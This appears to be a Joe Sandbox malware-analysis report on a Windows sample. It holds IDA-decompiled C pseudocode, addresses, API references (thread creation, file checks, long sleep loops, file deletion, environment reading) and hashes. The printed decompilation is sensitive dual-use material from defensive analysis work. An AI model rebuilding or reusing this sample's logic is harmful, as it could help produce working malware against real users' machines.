                                                                                                                                      0x013012d2
                                                                                                                                      0x013012d5
                                                                                                                                      0x013012d7
                                                                                                                                      0x013012f0
                                                                                                                                      0x013012f3
                                                                                                                                      0x01301301
                                                                                                                                      0x01301309
                                                                                                                                      0x0130130e
                                                                                                                                      0x01301321
                                                                                                                                      0x01301323
                                                                                                                                      0x01301334
                                                                                                                                      0x0130133c
                                                                                                                                      0x01301341
                                                                                                                                      0x01301345
                                                                                                                                      0x013012d9
                                                                                                                                      0x013012d9
                                                                                                                                      0x013012e6
                                                                                                                                      0x013012eb
                                                                                                                                      0x013012eb
                                                                                                                                      0x01301348
                                                                                                                                      0x01301354
                                                                                                                                      0x0130135b
                                                                                                                                      0x01301363
                                                                                                                                      0x0130136f
                                                                                                                                      0x01301372
                                                                                                                                      0x013013a9
                                                                                                                                      0x013013b3
                                                                                                                                      0x01301374
                                                                                                                                      0x01301374
                                                                                                                                      0x01301377
                                                                                                                                      0x01301381
                                                                                                                                      0x0130138f
                                                                                                                                      0x01301399
                                                                                                                                      0x01301399
                                                                                                                                      0x01301377
                                                                                                                                      0x013013bb
                                                                                                                                      0x013013c3
                                                                                                                                      0x013013cb
                                                                                                                                      0x013013d4

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 0130127F
                                                                                                                                      • _wcslen.LIBCMT ref: 013012C9
                                                                                                                                        • Part of subcall function 01307692: __EH_prolog.LIBCMT ref: 01307697
                                                                                                                                        • Part of subcall function 013013D7: __EH_prolog.LIBCMT ref: 013013DC
                                                                                                                                        • Part of subcall function 013013D7: CreateThread.KERNELBASE ref: 01301422
                                                                                                                                        • Part of subcall function 013013D7: CreateThread.KERNELBASE ref: 01301432
                                                                                                                                        • Part of subcall function 013013D7: CreateThread.KERNELBASE(00000000,00000000,Function_000014C8,?,00000000,00000000), ref: 0130143E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateH_prologThread$_wcslen
                                                                                                                                      • String ID: zipzors!2
                                                                                                                                      • API String ID: 2218420387-3260678680
                                                                                                                                      • Opcode ID: a9b56b89d696d3332ae88e293c2e3a6d85aa5fa78a574c7769e6b0dca71abc8d
                                                                                                                                      • Instruction ID: d7f3273073309bccdb808266a3c6caf5f97d762cfa26aedb623c09fb0b267426
                                                                                                                                      • Opcode Fuzzy Hash: a9b56b89d696d3332ae88e293c2e3a6d85aa5fa78a574c7769e6b0dca71abc8d
                                                                                                                                      • Instruction Fuzzy Hash: 034171359001599FDB06FF68D964AEE7BF8BB28718F404159E801A32C5EF30AA05CB51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                      			E0130250A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				int _t36;
                                                                                                                                      				void* _t42;
                                                                                                                                      				void* _t43;
                                                                                                                                      				void* _t46;
                                                                                                                                      				void* _t48;
                                                                                                                                      				void* _t49;
                                                                                                                                      				void* _t51;
                                                                                                                                      				unsigned int _t54;
                                                                                                                                      				void* _t57;
                                                                                                                                      				void* _t58;
                                                                                                                                      				void* _t64;
                                                                                                                                      				void* _t81;
                                                                                                                                      				void* _t84;
                                                                                                                                      				void* _t99;
                                                                                                                                      
                                                                                                                                      				_t94 = __edx;
                                                                                                                                      				E01323174(E0132333D, __edx, __eflags);
                                                                                                                                      				_t1 = _t99 - 0x3c; // 0x1306b05
                                                                                                                                      				E0130295B(_t1);
                                                                                                                                      				 *(_t99 - 4) =  *(_t99 - 4) & 0x00000000;
                                                                                                                                      				_t4 = _t99 - 0x24; // 0x1306b1d
                                                                                                                                      				E01302801(_t4);
                                                                                                                                      				 *(_t99 - 4) = 1;
                                                                                                                                      				_t36 = PathFileExistsW(E01302712(0x132f9c8, __eflags)); // executed
                                                                                                                                      				if(_t36 == 0) {
                                                                                                                                      					L6:
                                                                                                                                      					_t26 = _t99 + 8; // 0xec810001
                                                                                                                                      					E013027E1( *_t26, _t94, 0x1329c7c);
                                                                                                                                      				} else {
                                                                                                                                      					_t107 =  *0x132fa30;
                                                                                                                                      					if( *0x132fa30 != 0) {
                                                                                                                                      						_t9 = _t99 - 0x54; // 0x1306aed
                                                                                                                                      						E0130295B(_t9);
                                                                                                                                      						 *(_t99 - 4) = 2;
                                                                                                                                      						_t42 = E01302709();
                                                                                                                                      						_t43 = E0130282E(0x132fa38, __eflags);
                                                                                                                                      						_t11 = _t99 - 0x470; // 0x13066d1
                                                                                                                                      						E013040FE(_t11, _t43, _t42);
                                                                                                                                      						E01302712(0x132f9c8, __eflags);
                                                                                                                                      						_t12 = _t99 - 0x54; // 0x1306aed
                                                                                                                                      						_t94 = _t12;
                                                                                                                                      						_t46 = E01307B34(_t12);
                                                                                                                                      						_t13 = _t99 - 0x54; // 0x1306aed
                                                                                                                                      						_t81 = _t13;
                                                                                                                                      						__eflags = _t46;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							 *(_t99 - 4) = 1;
                                                                                                                                      							E013028AF(_t81, _t94, __eflags);
                                                                                                                                      							goto L6;
                                                                                                                                      						} else {
                                                                                                                                      							_t48 = E01302709();
                                                                                                                                      							_t49 = E0130282E(_t81, __eflags);
                                                                                                                                      							_t14 = _t99 - 0x6c; // 0x1306ad5
                                                                                                                                      							_t15 = _t99 - 0x470; // 0x13066d1
                                                                                                                                      							_t51 = E0130421F(_t15, __eflags, _t14, _t49, _t48);
                                                                                                                                      							_t16 = _t99 - 0x3c; // 0x1306b05
                                                                                                                                      							E013028B4(_t16, _t94, _t51);
                                                                                                                                      							_t17 = _t99 - 0x6c; // 0x1306ad5
                                                                                                                                      							_t84 = _t17;
                                                                                                                                      							E013028AF(_t84, _t94, __eflags);
                                                                                                                                      							_push(_t84);
                                                                                                                                      							_t54 = E01302709();
                                                                                                                                      							_t19 = _t99 - 0x24; // 0x1306b1d
                                                                                                                                      							E013026E8(_t19, __edi, 0x132f9c8, _t54 >> 1);
                                                                                                                                      							_t20 = _t99 - 0x3c; // 0x1306b05
                                                                                                                                      							_t57 = E01302709();
                                                                                                                                      							_t58 = E0130282E(_t20, __eflags);
                                                                                                                                      							_t21 = _t99 - 0x24; // 0x1306b1d
                                                                                                                                      							E0130AEB0(E01302712(_t21, __eflags), _t58, _t57);
                                                                                                                                      							_t22 = _t99 + 8; // 0xec810001
                                                                                                                                      							_t23 = _t99 - 0x24; // 0x1306b1d
                                                                                                                                      							E01302792( *_t22, _t23);
                                                                                                                                      							_t24 = _t99 - 0x54; // 0x1306aed
                                                                                                                                      							E013028AF(_t24, _t94, __eflags);
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_t64 = E01302712(0x132f9c8, _t107);
                                                                                                                                      						_t6 = _t99 - 0x24; // 0x1306b1d
                                                                                                                                      						_t94 = _t6;
                                                                                                                                      						E01307BA1(_t64, _t6, _t107);
                                                                                                                                      						_t7 = _t99 + 8; // 0xec810001
                                                                                                                                      						_t8 = _t99 - 0x24; // 0x1306b1d
                                                                                                                                      						E01302792( *_t7, _t8);
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      				_t27 = _t99 - 0x24; // 0x1306b1d
                                                                                                                                      				E01302755(_t27, _t94, _t107);
                                                                                                                                      				_t28 = _t99 - 0x3c; // 0x1306b05
                                                                                                                                      				E013028AF(_t28, _t94, _t107);
                                                                                                                                      				_t29 = _t99 - 0xc; // 0x89645e5f
                                                                                                                                      				_t30 = _t99 + 8; // 0xec810001
                                                                                                                                      				 *[fs:0x0] =  *_t29;
                                                                                                                                      				return  *_t30;
                                                                                                                                      			}


















                                                                                                                                      0x0130250a
                                                                                                                                      0x0130250f
                                                                                                                                      0x0130251b
                                                                                                                                      0x0130251e
                                                                                                                                      0x01302523
                                                                                                                                      0x01302527
                                                                                                                                      0x0130252a
                                                                                                                                      0x01302534
                                                                                                                                      0x01302540
                                                                                                                                      0x01302548
                                                                                                                                      0x01302638
                                                                                                                                      0x01302638
                                                                                                                                      0x01302640
                                                                                                                                      0x0130254e
                                                                                                                                      0x0130254e
                                                                                                                                      0x01302555
                                                                                                                                      0x01302579
                                                                                                                                      0x0130257c
                                                                                                                                      0x01302586
                                                                                                                                      0x0130258a
                                                                                                                                      0x01302590
                                                                                                                                      0x01302596
                                                                                                                                      0x0130259c
                                                                                                                                      0x013025a3
                                                                                                                                      0x013025a8
                                                                                                                                      0x013025a8
                                                                                                                                      0x013025ad
                                                                                                                                      0x013025b2
                                                                                                                                      0x013025b2
                                                                                                                                      0x013025b5
                                                                                                                                      0x013025b7
                                                                                                                                      0x0130262f
                                                                                                                                      0x01302633
                                                                                                                                      0x00000000
                                                                                                                                      0x013025b9
                                                                                                                                      0x013025b9
                                                                                                                                      0x013025bf
                                                                                                                                      0x013025c5
                                                                                                                                      0x013025c9
                                                                                                                                      0x013025cf
                                                                                                                                      0x013025d5
                                                                                                                                      0x013025d8
                                                                                                                                      0x013025dd
                                                                                                                                      0x013025dd
                                                                                                                                      0x013025e0
                                                                                                                                      0x013025e5
                                                                                                                                      0x013025e9
                                                                                                                                      0x013025f0
                                                                                                                                      0x013025f4
                                                                                                                                      0x013025f9
                                                                                                                                      0x013025fc
                                                                                                                                      0x01302602
                                                                                                                                      0x01302608
                                                                                                                                      0x01302611
                                                                                                                                      0x01302616
                                                                                                                                      0x01302619
                                                                                                                                      0x01302620
                                                                                                                                      0x01302625
                                                                                                                                      0x01302628
                                                                                                                                      0x01302628
                                                                                                                                      0x01302557
                                                                                                                                      0x01302559
                                                                                                                                      0x0130255e
                                                                                                                                      0x0130255e
                                                                                                                                      0x01302563
                                                                                                                                      0x01302568
                                                                                                                                      0x0130256b
                                                                                                                                      0x0130256f
                                                                                                                                      0x0130256f
                                                                                                                                      0x01302555
                                                                                                                                      0x01302645
                                                                                                                                      0x01302648
                                                                                                                                      0x0130264d
                                                                                                                                      0x01302650
                                                                                                                                      0x01302655
                                                                                                                                      0x01302658
                                                                                                                                      0x0130265b
                                                                                                                                      0x01302664

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 0130250F
                                                                                                                                      • PathFileExistsW.KERNELBASE(00000000), ref: 01302540
                                                                                                                                        • Part of subcall function 01307BA1: __EH_prolog.LIBCMT ref: 01307BA6
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog$ExistsFilePath
                                                                                                                                      • String ID: zipzors!2
                                                                                                                                      • API String ID: 3509989144-3260678680
                                                                                                                                      • Opcode ID: 47a8f2c5fcfa0fd854d887d9e5a657a18d677e41b71f2856cff34ee421465d5c
                                                                                                                                      • Instruction ID: 13ed4907d5ce36db9c4478d2dac29f12691826a0eec8bf88164654da7e2d4116
                                                                                                                                      • Opcode Fuzzy Hash: 47a8f2c5fcfa0fd854d887d9e5a657a18d677e41b71f2856cff34ee421465d5c
                                                                                                                                      • Instruction Fuzzy Hash: 95314C7590011A9ACB06FBA8D9B89DF77F8AF3460CF104058E502671D6DF34AB08CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                      			E013042A0() {
                                                                                                                                      				void* _t22;
                                                                                                                                      				signed int _t25;
                                                                                                                                      				void* _t28;
                                                                                                                                      				intOrPtr _t33;
                                                                                                                                      				intOrPtr _t35;
                                                                                                                                      				intOrPtr _t45;
                                                                                                                                      				intOrPtr _t47;
                                                                                                                                      				signed int _t48;
                                                                                                                                      				void* _t50;
                                                                                                                                      				void* _t51;
                                                                                                                                      				void* _t52;
                                                                                                                                      
                                                                                                                                      				E01323174(E01323372, _t45, _t52);
                                                                                                                                      				_t47 = _t45;
                                                                                                                                      				 *((intOrPtr*)(_t51 - 0x18)) = _t35;
                                                                                                                                      				 *((intOrPtr*)(_t51 - 0x10)) = _t47;
                                                                                                                                      				 *(_t51 - 4) =  *(_t51 - 4) & 0x00000000;
                                                                                                                                      				_t33 = 0;
                                                                                                                                      				 *(_t51 - 0x14) =  *(_t51 - 0x14) & 0;
                                                                                                                                      				_t50 = 0;
                                                                                                                                      				if( *((char*)(E01304C36(E01304C09(_t45, 0, _t51, _t52, 0xe), _t52, _t35))) == 1) {
                                                                                                                                      					Sleep(0x2710);
                                                                                                                                      				}
                                                                                                                                      				while(1) {
                                                                                                                                      					Sleep(0xea60); // executed
                                                                                                                                      					_t54 =  *((intOrPtr*)(_t51 - 0x18));
                                                                                                                                      					if( *((intOrPtr*)(_t51 - 0x18)) == 0) {
                                                                                                                                      						break;
                                                                                                                                      					}
                                                                                                                                      					L4:
                                                                                                                                      					_t22 = E013078B6(E01302712(0x132f9c8, _t54));
                                                                                                                                      					_t9 = _t51 + 0xc; // 0x4ec
                                                                                                                                      					_t39 =  *_t9 * 0x3e8;
                                                                                                                                      					_t55 = _t22 -  *_t9 * 0x3e8;
                                                                                                                                      					if(_t22 <  *_t9 * 0x3e8) {
                                                                                                                                      						goto L6;
                                                                                                                                      					}
                                                                                                                                      					E01304386(_t39, _t45, _t55);
                                                                                                                                      					while(1) {
                                                                                                                                      						Sleep(0xea60); // executed
                                                                                                                                      						_t54 =  *((intOrPtr*)(_t51 - 0x18));
                                                                                                                                      						if( *((intOrPtr*)(_t51 - 0x18)) == 0) {
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						goto L4;
                                                                                                                                      					}
                                                                                                                                      					L6:
                                                                                                                                      					__eflags = _t47;
                                                                                                                                      					if(_t47 == 0) {
                                                                                                                                      						L9:
                                                                                                                                      						__eflags =  *((intOrPtr*)(_t51 + 8));
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							continue;
                                                                                                                                      							do {
                                                                                                                                      								while(1) {
                                                                                                                                      									Sleep(0xea60); // executed
                                                                                                                                      									_t54 =  *((intOrPtr*)(_t51 - 0x18));
                                                                                                                                      									if( *((intOrPtr*)(_t51 - 0x18)) == 0) {
                                                                                                                                      										break;
                                                                                                                                      									}
                                                                                                                                      									goto L4;
                                                                                                                                      								}
                                                                                                                                      								goto L6;
                                                                                                                                      							} while (__eflags == 0);
                                                                                                                                      						}
                                                                                                                                      						_t12 = _t51 - 0x30; // 0x1306b11
                                                                                                                                      						_t25 = E01311AD3(_t23, E0130282E(E013078F2(_t12, _t45), __eflags));
                                                                                                                                      						_t13 = _t51 - 0x30; // 0x1306b11
                                                                                                                                      						_t43 = _t13;
                                                                                                                                      						_t48 = _t25;
                                                                                                                                      						E013028AF(_t13, _t45, __eflags);
                                                                                                                                      						__eflags = _t33;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							L13:
                                                                                                                                      							_t15 = _t51 + 0x14; // 0x1306b55
                                                                                                                                      							_t28 = E01311AD3(_t15, E0130282E(_t15, __eflags));
                                                                                                                                      							_pop(_t43);
                                                                                                                                      							__eflags = _t48 - _t28;
                                                                                                                                      							if(__eflags >= 0) {
                                                                                                                                      								E01304386(_t43, _t45, __eflags);
                                                                                                                                      								 *(_t51 - 0x14) = _t48;
                                                                                                                                      								_t33 = 1;
                                                                                                                                      							}
                                                                                                                                      							L2:
                                                                                                                                      							_t7 = _t51 - 0x10; // 0xf44d8bff
                                                                                                                                      							_t47 =  *_t7;
                                                                                                                                      							continue;
                                                                                                                                      						}
                                                                                                                                      						_t14 = _t51 - 0x14; // 0xffbc23e8
                                                                                                                                      						__eflags = _t48 -  *_t14;
                                                                                                                                      						if(__eflags >= 0) {
                                                                                                                                      							goto L2;
                                                                                                                                      						}
                                                                                                                                      						_t33 = 0;
                                                                                                                                      						__eflags = 0;
                                                                                                                                      						goto L13;
                                                                                                                                      					}
                                                                                                                                      					_t50 = _t50 + 1;
                                                                                                                                      					_t10 = _t51 + 0x10; // 0x89575653
                                                                                                                                      					__eflags = _t50 -  *_t10;
                                                                                                                                      					if(__eflags < 0) {
                                                                                                                                      						goto L9;
                                                                                                                                      					}
                                                                                                                                      					E01304386(_t43, _t45, __eflags); // executed
                                                                                                                                      					_t50 = 0;
                                                                                                                                      				}
                                                                                                                                      			}














                                                                                                                                      0x013042a5
                                                                                                                                      0x013042b0
                                                                                                                                      0x013042b2
                                                                                                                                      0x013042b5
                                                                                                                                      0x013042b8
                                                                                                                                      0x013042bc
                                                                                                                                      0x013042be
                                                                                                                                      0x013042c1
                                                                                                                                      0x013042d5
                                                                                                                                      0x013042dc
                                                                                                                                      0x013042dc
                                                                                                                                      0x013042e7
                                                                                                                                      0x013042ec
                                                                                                                                      0x013042f2
                                                                                                                                      0x013042f6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013042f8
                                                                                                                                      0x01304304
                                                                                                                                      0x01304309
                                                                                                                                      0x01304309
                                                                                                                                      0x01304310
                                                                                                                                      0x01304312
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01304314
                                                                                                                                      0x013042e7
                                                                                                                                      0x013042ec
                                                                                                                                      0x013042f2
                                                                                                                                      0x013042f6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013042f6
                                                                                                                                      0x0130431b
                                                                                                                                      0x0130431b
                                                                                                                                      0x0130431d
                                                                                                                                      0x0130432e
                                                                                                                                      0x0130432e
                                                                                                                                      0x01304332
                                                                                                                                      0x00000000
                                                                                                                                      0x013042e7
                                                                                                                                      0x013042e7
                                                                                                                                      0x013042ec
                                                                                                                                      0x013042f2
                                                                                                                                      0x013042f6
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013042f6
                                                                                                                                      0x00000000
                                                                                                                                      0x013042e7
                                                                                                                                      0x013042e7
                                                                                                                                      0x01304334
                                                                                                                                      0x01304344
                                                                                                                                      0x0130434a
                                                                                                                                      0x0130434a
                                                                                                                                      0x0130434d
                                                                                                                                      0x0130434f
                                                                                                                                      0x01304354
                                                                                                                                      0x01304356
                                                                                                                                      0x0130435f
                                                                                                                                      0x0130435f
                                                                                                                                      0x01304368
                                                                                                                                      0x0130436d
                                                                                                                                      0x0130436e
                                                                                                                                      0x01304370
                                                                                                                                      0x01304376
                                                                                                                                      0x0130437d
                                                                                                                                      0x01304380
                                                                                                                                      0x01304380
                                                                                                                                      0x013042e4
                                                                                                                                      0x013042e4
                                                                                                                                      0x013042e4
                                                                                                                                      0x00000000
                                                                                                                                      0x013042e4
                                                                                                                                      0x01304358
                                                                                                                                      0x01304358
                                                                                                                                      0x0130435b
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x0130435d
                                                                                                                                      0x0130435d
                                                                                                                                      0x00000000
                                                                                                                                      0x0130435d
                                                                                                                                      0x0130431f
                                                                                                                                      0x01304320
                                                                                                                                      0x01304320
                                                                                                                                      0x01304323
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01304325
                                                                                                                                      0x0130432a
                                                                                                                                      0x0130432a

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 013042A5
                                                                                                                                      • Sleep.KERNEL32(00002710,0000000E,?,00000000,?,00000000), ref: 013042DC
                                                                                                                                      • Sleep.KERNELBASE(0000EA60,0000000E,?,00000000,?,00000000), ref: 013042EC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep$H_prolog
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 307243931-0
                                                                                                                                      • Opcode ID: 51958a1b153c8620f5016b999d16dfb57136ae330ab7607c2cf2296e1443d75b
                                                                                                                                      • Instruction ID: f397d6f2e2001577397dc1f02e1b9b92799b6c11588bd188fc3f9b0ae4b04898
                                                                                                                                      • Opcode Fuzzy Hash: 51958a1b153c8620f5016b999d16dfb57136ae330ab7607c2cf2296e1443d75b
                                                                                                                                      • Instruction Fuzzy Hash: 5021BE35A042169BDF1BFBFDC5AA6AEBAE9AF5821CF10042AD701620C0DE745B44C655
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                      			E013199FC(void* __ecx) {
                                                                                                                                      				void* _t6;
                                                                                                                                      				void* _t14;
                                                                                                                                      				void* _t18;
                                                                                                                                      				WCHAR* _t19;
                                                                                                                                      
                                                                                                                                      				_t14 = __ecx;
                                                                                                                                      				_t19 = GetEnvironmentStringsW();
                                                                                                                                      				if(_t19 != 0) {
                                                                                                                                      					_t12 = (E01319942(_t19) - _t19 >> 1) + (E01319942(_t19) - _t19 >> 1);
                                                                                                                                      					_t6 = E013151CD(_t14, (E01319942(_t19) - _t19 >> 1) + (E01319942(_t19) - _t19 >> 1)); // executed
                                                                                                                                      					_t18 = _t6;
                                                                                                                                      					if(_t18 != 0) {
                                                                                                                                      						E0130AEB0(_t18, _t19, _t12);
                                                                                                                                      					}
                                                                                                                                      					E01314615(0);
                                                                                                                                      					FreeEnvironmentStringsW(_t19);
                                                                                                                                      				} else {
                                                                                                                                      					_t18 = 0;
                                                                                                                                      				}
                                                                                                                                      				return _t18;
                                                                                                                                      			}







                                                                                                                                      0x013199fc
                                                                                                                                      0x01319a06
                                                                                                                                      0x01319a0a
                                                                                                                                      0x01319a1b
                                                                                                                                      0x01319a1f
                                                                                                                                      0x01319a24
                                                                                                                                      0x01319a2a
                                                                                                                                      0x01319a2f
                                                                                                                                      0x01319a34
                                                                                                                                      0x01319a39
                                                                                                                                      0x01319a40
                                                                                                                                      0x01319a0c
                                                                                                                                      0x01319a0c
                                                                                                                                      0x01319a0c
                                                                                                                                      0x01319a4b

                                                                                                                                      APIs
                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 01319A00
                                                                                                                                      • _free.LIBCMT ref: 01319A39
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 01319A40
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentStrings$Free_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2716640707-0
                                                                                                                                      • Opcode ID: 8d6ff825e01b409ca7aef470df4b48da3a107c5d73315dfc3902b29549484960
                                                                                                                                      • Instruction ID: 6ca18d98f25201f1f85f6579024ad4031e92a52b2f3282fd3985c732dcf756fe
                                                                                                                                      • Opcode Fuzzy Hash: 8d6ff825e01b409ca7aef470df4b48da3a107c5d73315dfc3902b29549484960
                                                                                                                                      • Instruction Fuzzy Hash: A4E02237101522AAE23B322D7C59F7F2E5DDFC26BCF190029F44883148EE248D0A43B0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 88%
                                                                                                                                      			E01304386(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* __esi;
                                                                                                                                      				intOrPtr* _t23;
                                                                                                                                      				void* _t28;
                                                                                                                                      				WCHAR* _t39;
                                                                                                                                      				void* _t40;
                                                                                                                                      				intOrPtr _t52;
                                                                                                                                      				void* _t85;
                                                                                                                                      				short _t87;
                                                                                                                                      				void* _t89;
                                                                                                                                      				void* _t91;
                                                                                                                                      				void* _t92;
                                                                                                                                      
                                                                                                                                      				_t97 = __eflags;
                                                                                                                                      				_t79 = __edx;
                                                                                                                                      				E01323174(E01323394, __edx, __eflags);
                                                                                                                                      				_t92 = _t91 - 0x50;
                                                                                                                                      				_push(_t85);
                                                                                                                                      				E0130282E(E01304C09(_t79, _t85, _t89, __eflags, 0x25), __eflags);
                                                                                                                                      				_t23 = E0130282E(E01304C09(_t79, _t85, _t89, __eflags, 0x27), _t97);
                                                                                                                                      				_t52 =  *_t23;
                                                                                                                                      				if(_t52 != 0) {
                                                                                                                                      					L2:
                                                                                                                                      					_t1 = _t89 - 0x2c; // 0x1306b15, executed
                                                                                                                                      					E01304753(_t1, _t79, _t99); // executed
                                                                                                                                      					 *(_t89 - 4) =  *(_t89 - 4) & 0x00000000;
                                                                                                                                      					_t4 = _t89 - 0x2c; // 0x1306b15
                                                                                                                                      					_t80 = _t4;
                                                                                                                                      					E01307239(_t4, _t99);
                                                                                                                                      					 *(_t89 - 4) = 1;
                                                                                                                                      					_t100 = _t52;
                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                      						L6:
                                                                                                                                      						_t103 = _t52;
                                                                                                                                      						if(_t52 != 0) {
                                                                                                                                      							goto L7;
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_t7 = _t89 - 0x2c; // 0x1306b15
                                                                                                                                      						_t81 = _t7;
                                                                                                                                      						_t28 = E01307271(_t7, _t100);
                                                                                                                                      						 *(_t89 - 4) = 2;
                                                                                                                                      						_push(E01302712(_t28, _t100));
                                                                                                                                      						_t10 = _t89 - 0x2c; // 0x1306b15
                                                                                                                                      						_push(E01302712(_t10, _t100));
                                                                                                                                      						_push(E0130282E(E01304C09(_t7, _t85, _t89, _t100, 0x2b), _t100));
                                                                                                                                      						_push(E0130282E(E01304C09(_t7, _t85, _t89, _t100, 0x2a), _t100));
                                                                                                                                      						_t87 = E01311AD3(_t35, E0130282E(E01304C09(_t7, _t85, _t89, _t100, 0x29), _t100));
                                                                                                                                      						_t39 = E0130282E(E01304C09(_t81, _t87, _t89, _t100, 0x28), _t100);
                                                                                                                                      						_t80 = _t87;
                                                                                                                                      						_t40 = E01304C77(_t39, _t87, _t100); // executed
                                                                                                                                      						 *(_t89 - 4) = 1;
                                                                                                                                      						_t12 = _t89 - 0x5c; // 0x1306ae5
                                                                                                                                      						E01302755(_t12, _t87, _t100);
                                                                                                                                      						E01302814(_t92 + 0x10 - 0x18, _t87, _t100, 0x132fabc); // executed
                                                                                                                                      						E01304A96(_t92 + 0x10 - 0x18, _t87, _t100); // executed
                                                                                                                                      						if(_t40 == 0) {
                                                                                                                                      							goto L6;
                                                                                                                                      						} else {
                                                                                                                                      							_t102 = _t52;
                                                                                                                                      							if(_t52 != 0) {
                                                                                                                                      								L7:
                                                                                                                                      								_t14 = _t89 - 0x2c; // 0x1306b15
                                                                                                                                      								E013044DB(_t14, _t80, _t103);
                                                                                                                                      							} else {
                                                                                                                                      								DeleteFileW(E01302712(0x132f9c8, _t102)); // executed
                                                                                                                                      								E013070D8(E01302712(0x132fabc, _t102), _t80);
                                                                                                                                      								_t13 = _t89 - 0x44; // 0x1306afd
                                                                                                                                      								E013070D8(E01302712(_t13, _t102), _t80); // executed
                                                                                                                                      								goto L6;
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					_t15 = _t89 - 0x44; // 0x1306afd
